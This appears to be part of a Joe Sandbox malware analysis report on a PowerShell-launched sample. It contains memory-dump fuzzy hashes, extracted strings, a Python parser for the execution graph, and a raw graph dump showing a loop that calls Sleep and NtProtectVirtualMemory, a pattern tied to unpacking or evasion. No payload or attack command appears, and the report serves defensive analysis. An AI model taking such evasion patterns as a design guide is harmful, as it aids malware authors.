                                          • Source File: 00000002.00000002.2070951122.00007FF886EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff886ee0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 48964ed9cff71b0ba873a680c3238e1a8dab2edf1da0316b87def47bd615cae8
                                          • Instruction ID: f36d2f56d7d435ea27c41730df246ef672f81a661f67ae3163e99b54755eb1c9
                                          • Opcode Fuzzy Hash: 48964ed9cff71b0ba873a680c3238e1a8dab2edf1da0316b87def47bd615cae8
                                          • Instruction Fuzzy Hash: 77E1C230908A4E8FEBA8DF28C8557F977E1FB58750F14426AD81DC7291DF78A845CB82
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2072070098.00007FF886FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff886fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 628e6bdb08a72518360cec343e8339f5522e84c51d86d40147c6a4c66997dc78
                                          • Instruction ID: 9eac13ed206e97c97cc1cfec578b590f15d7c124ad0baff94e236b91118edc1d
                                          • Opcode Fuzzy Hash: 628e6bdb08a72518360cec343e8339f5522e84c51d86d40147c6a4c66997dc78
                                          • Instruction Fuzzy Hash: F3E1F132E0DA8E4FE7959B284865AB57BE1FF5A7A0B5C01BAD00DC71E2DE18EC05C341
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2072070098.00007FF886FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff886fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cba9a78eb15e5cabc98f446e3995b5eed6b405e3ef141c4241d220abeb805783
                                          • Instruction ID: 72b09d0863f7f0f4abc1190c94f935ba16533173a772c1b609f9c5f736e46ca6
                                          • Opcode Fuzzy Hash: cba9a78eb15e5cabc98f446e3995b5eed6b405e3ef141c4241d220abeb805783
                                          • Instruction Fuzzy Hash: A8D12132E0DA9E4FE7969A6858556B4BBE1FF562A0B5C01FAC10DC71D3EE18EC05C342
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2072070098.00007FF886FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff886fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2dd606c5396b417d46926c5d1bc7062c77b3de4f636eaae5844841401c34bb7b
                                          • Instruction ID: b6362ab0a80ea5e33d2db3da9ce0010f2c4afea969660b145bf38b781ce348ff
                                          • Opcode Fuzzy Hash: 2dd606c5396b417d46926c5d1bc7062c77b3de4f636eaae5844841401c34bb7b
                                          • Instruction Fuzzy Hash: CA51A462D1DA8E5FE79597684861AB4BAE1FF5A7A0B5C01F9D00CC71E2DD1CEC44C302
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2072070098.00007FF886FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff886fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 22509bde3acec883ade9e94da59b305751da03c49e774dc222ef04ae88a183df
                                          • Instruction ID: e3b432c7024e17c4b7631daaaabd4d5ae4d0b50e0450753920f6e76ee58756d1
                                          • Opcode Fuzzy Hash: 22509bde3acec883ade9e94da59b305751da03c49e774dc222ef04ae88a183df
                                          • Instruction Fuzzy Hash: 6631D062D1EA9F1BF2A6966818112B8AAD1FF157A0B6C05BAD20DD31D3ED0CEC04C342
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2070951122.00007FF886EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff886ee0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                          • Instruction ID: ae113b718360fcc78e040c5d69947053363175cf3dc4a98d72d452be364208e0
                                          • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                          • Instruction Fuzzy Hash: EE01677111CB0C4FD748EF0CE455AA5B7E0FB95364F10056DE58AC3651DA36E881CB46
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2070951122.00007FF886EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff886ee0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: K_^$K_^$K_^$K_^
                                          • API String ID: 0-4267328068
                                          • Opcode ID: fe0de88e22ac318130e52982036a11c0e5c035e1ca020a5f65c5ce5bb77f47ae
                                          • Instruction ID: 41dedb51260d3268a9299a4835b59453ebf62ec0e5a2eed2b62bad60fd2029fb
                                          • Opcode Fuzzy Hash: fe0de88e22ac318130e52982036a11c0e5c035e1ca020a5f65c5ce5bb77f47ae
                                          • Instruction Fuzzy Hash: C3319062D4D9D35FE24756285CA90FABF60BF62398B5D01F2C0DC8F0D3EE18684382A1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1845291372.0000000004810000.00000040.00000800.00020000.00000000.sdmp, Offset: 04810000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4810000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: \Vj
                                          • API String ID: 0-3251626932
                                          • Opcode ID: b33d892cedb6da2c244b852e23403830a1d7b03bba4e02856e0aec3bb4163cad
                                          • Instruction ID: da5c89ba76c9250be4a2394f824a2b42bae18477b9a9c12007cfac5f5969737c
                                          • Opcode Fuzzy Hash: b33d892cedb6da2c244b852e23403830a1d7b03bba4e02856e0aec3bb4163cad
                                          • Instruction Fuzzy Hash: EBB14271E00209CFDB10CFA9D8857DEBBF6BF88314F148A2AD615E7264EB74A845CB45
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1845291372.0000000004810000.00000040.00000800.00020000.00000000.sdmp, Offset: 04810000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4810000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d8bd51391d840b532a331c50408eeae3a82038690f5283777da273d9892905d0
                                          • Instruction ID: e8933722b79b87c8d4330a507cd0646fc241dad5ba3eca01e5efe48b7b1d430b
                                          • Opcode Fuzzy Hash: d8bd51391d840b532a331c50408eeae3a82038690f5283777da273d9892905d0
                                          • Instruction Fuzzy Hash: 53B18771E00309CFDB10CFA9D8957DDBBF6AF48314F148A2AD615E7264EB74A845CB81
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1845291372.0000000004810000.00000040.00000800.00020000.00000000.sdmp, Offset: 04810000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4810000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fc9a044803e0f11c139bac10e836cdce2420224bfbc9db5c3b1d66ed156097e5
                                          • Instruction ID: 8d7f939eaee8265aad36291829e71256641c218e0dbd0a8f7c180a1a72e4cc50
                                          • Opcode Fuzzy Hash: fc9a044803e0f11c139bac10e836cdce2420224bfbc9db5c3b1d66ed156097e5
                                          • Instruction Fuzzy Hash: C7417A71B002548FD7149B65C8A8BAABBF6FF89750F144969E406EB7A0DF34AC41CB50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (fEl$(fEl$(fEl$(fEl$(fEl$(fEl$(fEl$(fEl$x.6k$-6k
                                          • API String ID: 0-2422737603
                                          • Opcode ID: 2caf3c896b0fe116dced22967d42b3c777cc80a8b93ccde01d6b15c0b9832842
                                          • Instruction ID: f30ed4b776830d6d788f13ba6ccc5d1c18a9b54b84dea680b4b6ebc37f5bbea0
                                          • Opcode Fuzzy Hash: 2caf3c896b0fe116dced22967d42b3c777cc80a8b93ccde01d6b15c0b9832842
                                          • Instruction Fuzzy Hash: 3C82B8B4B10215DFDB64EBA4C850FAAB7B2AF85300F24C66AD50AAF345DB71DC41CB91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (fEl$(fEl$(fEl$(fEl$(fEl$;l$;l
                                          • API String ID: 0-2228137991
                                          • Opcode ID: 6c67ab2a9ed6d47ad87a9fc1421d5741da2ca4a3aade43bf3d02ee0299a51159
                                          • Instruction ID: 32e5380b7e54b7582eab36c0884d64e6ac235dd1e2542c9adf4247672ec5eb3a
                                          • Opcode Fuzzy Hash: 6c67ab2a9ed6d47ad87a9fc1421d5741da2ca4a3aade43bf3d02ee0299a51159
                                          • Instruction Fuzzy Hash: BC7267B4B003058FD754DBA8C854F9AB7B2AF89304F24C169E90A9F756DB72ED42CB41
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1845291372.0000000004810000.00000040.00000800.00020000.00000000.sdmp, Offset: 04810000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4810000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8Nj$h]j$h]j$h]j$Ij
                                          • API String ID: 0-1679908211
                                          • Opcode ID: 2b4082c073482885dcd616f573d8d192335e8f76e5b41779343ac180cf9b9dd1
                                          • Instruction ID: f972efac714a620beedcec79e8783cbcd75d233e4bc7c4534c5fe053eaf52a50
                                          • Opcode Fuzzy Hash: 2b4082c073482885dcd616f573d8d192335e8f76e5b41779343ac180cf9b9dd1
                                          • Instruction Fuzzy Hash: E0226130B402148FDB25DB64D8546AEB7B6BF89304F1485EAD40AEB361DF35AD81CF91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (fEl$(fEl$x.6k$x.6k$-6k
                                          • API String ID: 0-2873535965
                                          • Opcode ID: f451672bfef46667d34e50037cd6f447e5f0c3155c056344fc07d6b1ccf43589
                                          • Instruction ID: cf767d26c5dd49534badcb28a64b6e20ef352f0c4c39f8bf06c4de8ad9f170f8
                                          • Opcode Fuzzy Hash: f451672bfef46667d34e50037cd6f447e5f0c3155c056344fc07d6b1ccf43589
                                          • Instruction Fuzzy Hash: 5EF1C4B4B002159FEB24EB68C950F6EB7B3AF84340F10C1A9D5096F781DB75ED818B91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (fEl$(fEl$;l
                                          • API String ID: 0-2467197750
                                          • Opcode ID: 4e9c4fa48ff8a55b5f2b05c9ebd80aed184871d7d4d2576ead1308bbe6eb035f
                                          • Instruction ID: 8e724a804588e8a603b51c93c312f919b7cfaf1e235c3cf20163e56e701bc02b
                                          • Opcode Fuzzy Hash: 4e9c4fa48ff8a55b5f2b05c9ebd80aed184871d7d4d2576ead1308bbe6eb035f
                                          • Instruction Fuzzy Hash: 274247B8B00205DFD750DB58C980F99B7B2AF88314F158299E90A9F756DB72ED42CB41
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (fEl$(fEl$x.6k
                                          • API String ID: 0-2296717983
                                          • Opcode ID: 6cd7f17f0447ab2ee4ac3385fbe0f00774c5a039de98ad22f86f6c3378af4002
                                          • Opcode Fuzzy Hash: 2dfb526ca74570ad0f3ce63b6ea8e44d18d59a9c96911443693dca8c53b144e3
                                          • Instruction Fuzzy Hash: 53211774A056498FCB00DF98D4909AAFBB5FF49310B14859AE849EB362C731FD41CBA1
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5c91b0baa64d55ea949db4402ba0c066e608b67bca94e269cc64ef192b0b2804
                                          • Instruction ID: 29c1f95ea1b60a2387abfd957f8efa6a1f161eb4dcd77124c772660377f80301
                                          • Opcode Fuzzy Hash: 5c91b0baa64d55ea949db4402ba0c066e608b67bca94e269cc64ef192b0b2804
                                          • Instruction Fuzzy Hash: B61186B560424ADFD7A99A64D840F22BBB5EF83215F18875FD8068F356DB32D802C751
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e208b483aa3b7b0cb1054ba16f8246f8fdaf0e3400530a579fbdb2248061d24a
                                          • Instruction ID: 372daaa3ec9a19a5d6e5a89d54dffd1b6425a2f8a39b6f74806b60c6779064d3
                                          • Opcode Fuzzy Hash: e208b483aa3b7b0cb1054ba16f8246f8fdaf0e3400530a579fbdb2248061d24a
                                          • Instruction Fuzzy Hash: FAE0DFB0200143DBCB50DF04C980A54BBA2BB80609F28C298E01A0F282CB32DA43CB08
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 84Cl$84Cl$84Cl$84Cl
                                          • API String ID: 0-733557901
                                          • Opcode ID: 776ac19ed1329c08256a71109a7091baa400e1c5e0000a54142aac8ecc537efe
                                          • Instruction ID: d1be827efea2e4cbf4632e998c107ce2d55f7bae93c8a97ac0b4c26ed3fea9b4
                                          • Opcode Fuzzy Hash: 776ac19ed1329c08256a71109a7091baa400e1c5e0000a54142aac8ecc537efe
                                          • Instruction Fuzzy Hash: 59E1C3B4B00219DFDB58EFA4C444BAEB7A2BF89310F148569E906AF350DB71DC46CB91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: T5k$DU5k$XYEl$XYEl
                                          • API String ID: 0-1081426554
                                          • Opcode ID: ee2855e21f307036c1e831cc545600e559f406660ca9f851e6b780f45ed198dc
                                          • Instruction ID: d3f2b5ad1f89ee584464052c9ae1afef71a5031a43e0aa80116a6ec86fbe24a7
                                          • Opcode Fuzzy Hash: ee2855e21f307036c1e831cc545600e559f406660ca9f851e6b780f45ed198dc
                                          • Instruction Fuzzy Hash: 77912AB1B04206CFC751EB78D450BAAF7A2AFC9221F24C66AD406DB351DA71CC49C7A1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (fEl$(fEl$(fEl$(fEl
                                          • API String ID: 0-1594125813
                                          • Opcode ID: 54178ea7ee9cb99f13dc0d577cb1d7381d81123e0ac9ffa196e313acac5e3912
                                          • Instruction ID: 741752afd3e4b117424865ba75b72e3a0933ad801122db1fdee76ffbd90ba377
                                          • Opcode Fuzzy Hash: 54178ea7ee9cb99f13dc0d577cb1d7381d81123e0ac9ffa196e313acac5e3912
                                          • Instruction Fuzzy Hash: 04718DB4B10205DFE754EF68C844FAAB7B2AF89310F54C169D806AB344DB72EC41CB91

                                          Execution Graph

                                          Execution Coverage:3.4%
                                          Dynamic/Decrypted Code Coverage:99.7%
                                          Signature Coverage:3%
                                          Total number of Nodes:1581
                                          Total number of Limit Nodes:22
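The report exports the graph as a flattened DOT-style token stream: a decimal node ID, the node's hex address, an optional label (the API called, or the CRT routine name plus "N API calls"), and `src->dst` edges. That stream is hard to read inline, so the following Python parser is added here as an example; it is not part of the Joe Sandbox report or its tooling. It rebuilds the graph from the text, picks out Windows API names in node labels (heuristically, as CamelCase identifiers), lists the APIs reachable from a node, and reports strongly connected components that contain an API call, which is how the Sleep / NtProtectVirtualMemory cycle at 0x4586e09 surfaces from the noise of CRT start-up code. The sample text is a constructed excerpt of this report's own graph tokens; the token conventions (short decimal IDs, addresses of six or more hex digits) are assumptions inferred from the report.

```python
"""Rebuild a Joe Sandbox execution_graph from its flattened token stream.

Added example for this report page; not Joe Sandbox code. Token conventions
(decimal node IDs, hex addresses of 6+ digits, free-text labels, `src->dst`
edges) are assumptions inferred from the graph text in the report.
"""
import re
from collections import defaultdict

# Constructed excerpt of the report's graph text: the 0x4586e09 Sleep /
# NtProtectVirtualMemory cluster plus a few CRT nodes around GetLastError.
SAMPLE = (
    "execution_graph "
    "6039 4586e09 6040 4586e59 6039->6040 6040->6039 6041 4586e82 Sleep 6040->6041 "
    "6042 4586ecd NtProtectVirtualMemory 6040->6042 6041->6039 6042->6040 "
    "6467 22b25af6 GetLastError 6462->6467 6468 22b25b12 6467->6468 "
    "6469 22b25b0c 6467->6469 6471 22b2637b __dosmaperr 20 API calls 6468->6471 "
    "6473 22b25b61 SetLastError 6468->6473"
)

NODE_ID = re.compile(r"^\d+$")               # e.g. 6039 (assumed short decimal)
HEX_ADDR = re.compile(r"^[0-9a-f]{6,16}$")   # e.g. 4586e09, 22b25af6
EDGE = re.compile(r"^(\d+)->(\d+)$")         # e.g. 6040->6041
# Heuristic for a Windows API name inside a label: a CamelCase identifier such as
# GetLastError or NtProtectVirtualMemory. CRT labels (_abort, __dosmaperr) and the
# words of "20 API calls" do not match.
API_NAME = re.compile(r"^[A-Z][A-Za-z0-9]*[a-z][A-Za-z0-9]*$")


def parse_graph(text):
    """Return (nodes, edges); nodes maps id -> {'addr': str|None, 'label': [tokens]}."""
    tokens = text.split()
    if tokens and tokens[0] == "execution_graph":
        tokens = tokens[1:]
    nodes, edges, current, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE.match(tok)
        if m:
            edges.append((m.group(1), m.group(2)))
            for n in m.groups():               # endpoints may appear before their definition
                nodes.setdefault(n, {"addr": None, "label": []})
            i += 1
            continue
        # A node definition is a decimal ID immediately followed by a hex address.
        if NODE_ID.match(tok) and i + 1 < len(tokens) and HEX_ADDR.match(tokens[i + 1]):
            current = tok
            nodes[tok] = {"addr": tokens[i + 1], "label": []}
            i += 2
            continue
        if current is not None:                # anything else labels the node being defined
            nodes[current]["label"].append(tok)
        i += 1
    return nodes, edges


def api_calls(nodes):
    """Node id -> API names found in its label (nodes without any are omitted)."""
    found = {nid: [t for t in n["label"] if API_NAME.match(t)] for nid, n in nodes.items()}
    return {nid: names for nid, names in found.items() if names}


def successors(edges):
    succ = defaultdict(list)
    for src, dst in edges:
        succ[src].append(dst)
    return succ


def reachable_apis(nodes, edges, start):
    """Set of API names on every node reachable from `start` (iterative DFS)."""
    succ, apis = successors(edges), api_calls(nodes)
    seen, stack, found = set(), [start], set()
    while stack:
        n = stack.pop()
        if n in seen:
            continue
        seen.add(n)
        found.update(apis.get(n, ()))
        stack.extend(succ[n])
    return found


def api_loops(nodes, edges):
    """Strongly connected components (Tarjan) that contain at least one API call.

    A component with more than one node, or a self-edge, is a loop. Returns a list
    of (sorted node ids, sorted API names); a loop through Sleep and
    NtProtectVirtualMemory is the kind of stub a triager looks at first.
    """
    succ, apis = successors(edges), api_calls(nodes)
    index, low, on_stack, stack, loops = {}, {}, set(), [], []

    def strongconnect(v):
        index[v] = low[v] = len(index)
        stack.append(v)
        on_stack.add(v)
        for w in succ[v]:
            if w not in index:
                strongconnect(w)
                low[v] = min(low[v], low[w])
            elif w in on_stack:
                low[v] = min(low[v], index[w])
        if low[v] == index[v]:                 # v is the root of a component
            comp = []
            while True:
                w = stack.pop()
                on_stack.discard(w)
                comp.append(w)
                if w == v:
                    break
            if len(comp) > 1 or v in succ[v]:
                names = sorted({a for n in comp for a in apis.get(n, ())})
                if names:
                    loops.append((sorted(comp, key=int), names))

    for v in list(nodes):
        if v not in index:
            strongconnect(v)
    return loops


if __name__ == "__main__":
    nodes, edges = parse_graph(SAMPLE)
    print(f"{len(nodes)} nodes, {len(edges)} edges")
    for comp, names in api_loops(nodes, edges):
        print("loop over", [nodes[n]["addr"] for n in comp], "calls", names)
    print("reachable from 4586e09:", sorted(reachable_apis(nodes, edges, "6039")))
```

Run on the full graph text, `api_loops` separates the handful of API-bearing cycles from the ~1500 CRT nodes, and `reachable_apis` on a node of interest gives the call set without reading the edge list by hand.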
                                          [Execution graph: rendered in the report as an interactive graph; the text export is a DOT-style token stream (decimal node ID, hex address, optional label, src->dst edges) that is not readable inline. Content recoverable from this part of the export:]
                                          • Code at 0x22b2xxxx: MSVC CRT start-up, error-handling and teardown paths, labelled _abort, __dosmaperr, _free, ___scrt_fastfail, _ValidateLocalCookies, ___scrt_is_nonwritable_in_current_image, ___std_exception_copy, __startOneArgErrorHandling, __raise_exc, dllmain_raw, dllmain_crt_process_attach / dllmain_crt_process_detach, try_get_function, __RTC_Initialize and ___vcrt_* initialisation.
                                          • Windows APIs reached from that code: GetLastError, SetLastError, IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, ExitProcess, GetModuleHandleW, GetModuleHandleExW, GetModuleHandleA, GetProcAddress, LoadLibraryExW, FreeLibrary, GetPEB, RtlEnterCriticalSection, RtlLeaveCriticalSection, RtlDeleteCriticalSection, InitializeCriticalSectionAndSpinCount, RtlInitializeSListHead, RtlDecodePointer, RaiseException, RtlUnwind, RtlSizeHeap, RtlReAllocateHeap, RtlFreeHeap, TlsAlloc, TlsGetValue, TlsSetValue, GetStartupInfoW, GetStdHandle, GetFileType, GetEnvironmentStringsW, FreeEnvironmentStringsW, WideCharToMultiByte, FindFirstFileExA.
                                          • Code at 0x4586e09: a cycle between 4586e09, 4586e59, 4586e82 (Sleep) and 4586ecd (NtProtectVirtualMemory), i.e. a loop that sleeps and changes page protection.
20 API calls _free 6208->6226 6214 22b27d00 6209->6214 6215 22b2571e _free 20 API calls 6210->6215 6216 22b2571e _free 20 API calls 6211->6216 6228 22b27d2d 6211->6228 6212 22b2571e _free 20 API calls 6217 22b27d37 6212->6217 6218 22b2571e _free 20 API calls 6213->6218 6219 22b290ba ___free_lconv_mon 20 API calls 6214->6219 6220 22b27d85 6215->6220 6221 22b27d22 6216->6221 6222 22b2571e _free 20 API calls 6217->6222 6223 22b27e04 6218->6223 6219->6211 6224 22b2571e _free 20 API calls 6220->6224 6225 22b291b8 __fassign 20 API calls 6221->6225 6222->6202 6223->6195 6224->6227 6225->6228 6226->6208 6227->6203 6228->6212 6229->6200 6233 22b25b7a GetLastError 6230->6233 6234 22b25b93 6233->6234 6235 22b25b99 6233->6235 6236 22b25e08 __dosmaperr 11 API calls 6234->6236 6239 22b25bf0 SetLastError 6235->6239 6252 22b2637b 6235->6252 6236->6235 6241 22b25744 GetLastError 6239->6241 6240 22b25e5e __dosmaperr 11 API calls 6243 22b25bc8 6240->6243 6241->6161 6242 22b25bb3 6244 22b2571e _free 17 API calls 6242->6244 6243->6242 6246 22b25bcf 6243->6246 6245 22b25bb9 6244->6245 6247 22b25be7 SetLastError 6245->6247 6259 22b2593c 6246->6259 6247->6241 6250 22b2571e _free 17 API calls 6251 22b25be0 6250->6251 6251->6239 6251->6247 6257 22b26388 __dosmaperr 6252->6257 6253 22b263b3 RtlAllocateHeap 6255 22b25bab 6253->6255 6253->6257 6254 22b263c8 6256 22b26368 __dosmaperr 19 API calls 6254->6256 6255->6240 6255->6242 6256->6255 6257->6253 6257->6254 6264 22b2474f 6257->6264 6269 22b25914 6259->6269 6265 22b24793 __dosmaperr RtlEnterCriticalSection RtlLeaveCriticalSection 6264->6265 6266 22b24765 6265->6266 6267 22b22ada _ValidateLocalCookies 5 API calls 6266->6267 6268 22b2478f 6267->6268 6268->6257 6270 22b25854 __dosmaperr RtlEnterCriticalSection RtlLeaveCriticalSection 6269->6270 6271 22b25938 6270->6271 6272 22b258c4 6271->6272 6273 22b25758 __dosmaperr 20 API calls 6272->6273 6274 22b258e8 6273->6274 6274->6250 6276 22b2382d 6275->6276 6280 22b2384b ___vcrt_freefls@4 6275->6280 
6277 22b2383b 6276->6277 6281 22b23b67 6276->6281 6286 22b23ba2 6277->6286 6280->6084 6291 22b23a82 6281->6291 6283 22b23b81 6284 22b23b99 TlsGetValue 6283->6284 6285 22b23b8d 6283->6285 6284->6285 6285->6277 6287 22b23a82 try_get_function 5 API calls 6286->6287 6288 22b23bbc 6287->6288 6289 22b23bd7 TlsSetValue 6288->6289 6290 22b23bcb 6288->6290 6289->6290 6290->6280 6292 22b23aaa 6291->6292 6296 22b23aa6 __crt_fast_encode_pointer 6291->6296 6292->6296 6297 22b239be 6292->6297 6295 22b23ac4 GetProcAddress 6295->6296 6296->6283 6302 22b239cd try_get_first_available_module 6297->6302 6298 22b239ea LoadLibraryExW 6299 22b23a05 GetLastError 6298->6299 6298->6302 6299->6302 6300 22b23a60 FreeLibrary 6300->6302 6301 22b23a77 6301->6295 6301->6296 6302->6298 6302->6300 6302->6301 6303 22b23a38 LoadLibraryExW 6302->6303 6303->6302 6310 22b23856 6304->6310 6306 22b223f1 6306->6078 6307 22b253da 6306->6307 6308 22b25b7a __dosmaperr 20 API calls 6307->6308 6309 22b223fd 6308->6309 6309->6076 6309->6077 6311 22b23862 GetLastError 6310->6311 6312 22b2385f 6310->6312 6313 22b23b67 ___vcrt_FlsGetValue 6 API calls 6311->6313 6312->6306 6314 22b23877 6313->6314 6315 22b238dc SetLastError 6314->6315 6316 22b23ba2 ___vcrt_FlsSetValue 6 API calls 6314->6316 6321 22b23896 6314->6321 6315->6306 6317 22b23890 6316->6317 6318 22b238b8 6317->6318 6319 22b23ba2 ___vcrt_FlsSetValue 6 API calls 6317->6319 6317->6321 6320 22b23ba2 ___vcrt_FlsSetValue 6 API calls 6318->6320 6318->6321 6319->6318 6320->6321 6321->6315 6322 22b21c5b 6323 22b21c6b ___scrt_fastfail 6322->6323 6326 22b212ee 6323->6326 6325 22b21c87 6327 22b21324 ___scrt_fastfail 6326->6327 6328 22b213b7 GetEnvironmentVariableW 6327->6328 6352 22b210f1 6328->6352 6331 22b210f1 57 API calls 6332 22b21465 6331->6332 6333 22b210f1 57 API calls 6332->6333 6334 22b21479 6333->6334 6335 22b210f1 57 API calls 6334->6335 6336 22b2148d 6335->6336 6337 22b210f1 57 API calls 6336->6337 6338 22b214a1 6337->6338 6339 22b210f1 57 API calls 
